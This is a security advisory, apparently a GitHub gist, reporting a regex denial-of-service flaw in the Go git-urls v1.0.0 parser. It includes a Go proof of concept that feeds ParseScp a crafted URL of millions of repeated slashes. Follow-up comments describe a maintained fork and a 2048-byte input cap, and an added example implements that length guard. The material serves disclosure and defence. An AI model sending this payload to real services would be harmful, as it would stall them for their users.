Last active
December 5, 2023 17:12
Security issue in regex inside git-urls package
[NAME OF AFFECTED PRODUCT(S)]
- https://pkg.go.dev/github.com/whilp/git-urls v1.0.0
[AFFECTED AND/OR FIXED VERSION(S)]
- v1.0.0
- Status: not fixed
[VULNERABILITY]
- Regex Denial of Service
[DESCRIPTION]
The regex on line 35 of urls.go is vulnerable to regex denial of service when a long input is provided in the directory path of the git URL.
It is possible to cause a 7s delay, but only because the payload in the URL was too long. Here is the PoC:
```go
package main

import (
	"fmt"
	"strings"
	"time"

	giturls "github.com/whilp/git-urls"
)

func main() {
	payload := strings.Repeat("////", 19000000) // payload used; the repeat count can be tweaked to cause a 7 second delay
	malicious_url := "6en6ar@-:0////" + payload + "\\" // trailing literal backslash (the gist's `"\"` literal did not compile)
	begin := time.Now()
	//u, err := giturls.ParseScp("remote_username@10.10.0.2:/remote/directory")// normal git url
	_, err := giturls.ParseScp(malicious_url)
	if err != nil {
		fmt.Println("[ - ] Error ->" + err.Error()) // fmt.Errorf only built the error and discarded it
	}
	//fmt.Println("[ + ] Url --> " + u.Host)
	elapse := time.Since(begin)
	fmt.Printf("Function took %s\n", elapse)
}
```
This vulnerable regex causes the application to take a longer time parsing the input.
There is no version 1.0.1 of the git-urls library.
Thanks for noticing. I updated the version in the description.
@makkes We've moved the repo to our organization and fixed the current issue. Please, check https://github.com/chainguard-dev/git-urls.
Thanks for the heads-up, @hectorj2f! Is the goal to keep maintaining the lib there or just as long as a fix version hasn't been released upstream?
As a side note, we fixed it in Flux by limiting the URL string we pass to git-urls to 2048 bytes.
Yes, we'll keep maintaining our copy independently of what upstream repo does. It currently looks unmaintained for the moment.
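The advisory's own measurement shows that parse time grows with the length of the URL string, and the Flux comment above describes the corresponding mitigation: cap the string at 2048 bytes before it reaches git-urls. The program below is an added example written for this page, not code from the gist, from git-urls or from Flux. It puts an O(1) length guard in front of an scp-style matcher so that oversized input is rejected before any regex work is done. The `scpLike` regex, `ParseScpBounded`, `MaxURLLen` and the sample inputs are constructed stand-ins and are not the matcher from git-urls' urls.go.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// MaxURLLen mirrors the 2048-byte cap the Flux comment describes (constructed value for this example).
const MaxURLLen = 2048

// ErrURLTooLong is returned before any regex runs on over-length input.
var ErrURLTooLong = errors.New("git url exceeds maximum allowed length")

// scpLike is a constructed stand-in for an scp-style "user@host:path" matcher.
// It is not the regex from git-urls' urls.go.
var scpLike = regexp.MustCompile(`^(?:([\w.~-]+)@)?([\w.-]+):(.*)$`)

// ScpURL holds the pieces of an scp-style URL.
type ScpURL struct {
	User, Host, Path string
}

// parseScpUnbounded runs the matcher on whatever it is given; its cost grows
// with input length, which is the behaviour the advisory measured.
func parseScpUnbounded(raw string) (*ScpURL, error) {
	m := scpLike.FindStringSubmatch(raw)
	if m == nil {
		return nil, fmt.Errorf("not an scp-style url: %q", truncate(raw, 32))
	}
	return &ScpURL{User: m[1], Host: m[2], Path: m[3]}, nil
}

// ParseScpBounded rejects inputs longer than maxLen before any matching happens.
// len(raw) is O(1) in Go, so the guard costs nothing on normal input and bounds
// the work the matcher can be made to do.
func ParseScpBounded(raw string, maxLen int) (*ScpURL, error) {
	if len(raw) > maxLen {
		return nil, fmt.Errorf("%w: %d bytes > %d", ErrURLTooLong, len(raw), maxLen)
	}
	return parseScpUnbounded(raw)
}

// truncate keeps error messages short even when the rejected input is huge.
func truncate(s string, n int) string {
	if len(s) <= n {
		return s
	}
	return s[:n] + "..."
}

func main() {
	normal := "remote_username@10.10.0.2:/remote/directory"
	// Constructed oversized input in the shape of the advisory's PoC, with a much smaller repeat count.
	oversized := "6en6ar@-:0////" + strings.Repeat("////", 100000) + "\\"

	for _, in := range []string{normal, oversized} {
		u, err := ParseScpBounded(in, MaxURLLen)
		switch {
		case errors.Is(err, ErrURLTooLong):
			fmt.Println("rejected before matching:", err)
		case err != nil:
			fmt.Println("parse error:", err)
		default:
			fmt.Printf("user=%q host=%q path=%q\n", u.User, u.Host, u.Path)
		}
	}
}
```

The guard belongs at the boundary where untrusted input enters (the layer that receives the URL), not inside the matcher, so that every caller gets the same bound; callers can distinguish a rejected-for-length input from a malformed one with `errors.Is(err, ErrURLTooLong)`.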